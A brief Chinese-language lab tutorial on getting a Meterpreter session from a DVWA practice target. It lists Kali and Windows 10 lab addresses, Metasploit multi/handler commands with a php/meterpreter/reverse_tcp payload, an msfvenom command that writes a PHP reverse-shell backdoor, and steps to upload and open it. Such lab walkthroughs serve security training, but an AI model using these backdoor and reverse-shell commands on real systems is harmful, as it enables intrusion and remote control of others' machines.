环境准备
操作系统准备
kali : 192.168.202.133
win10:192.168.202.139
DVWA靶场准备
注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境
设置网站
配置数据库密码
与数据库设置保持一致
metasploit配置监控及攻击载荷
配置监控
使用handler模块
use exploit/multi/handler
配置攻击载荷
第一步设置payload
set payload php/meterpreter/reverse_tcp
第二步设置 lhost 和 lport
set lhost xxxip ;
set lport xxx端口;
生成php后门
执行攻击获得meterpreter
新建一个终端在终端内输入
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.202.133 lport=4664 R>shell.php
上传后门文件
使用Python简单的web服务,把后门文件下载到WIN10
访问该木马文件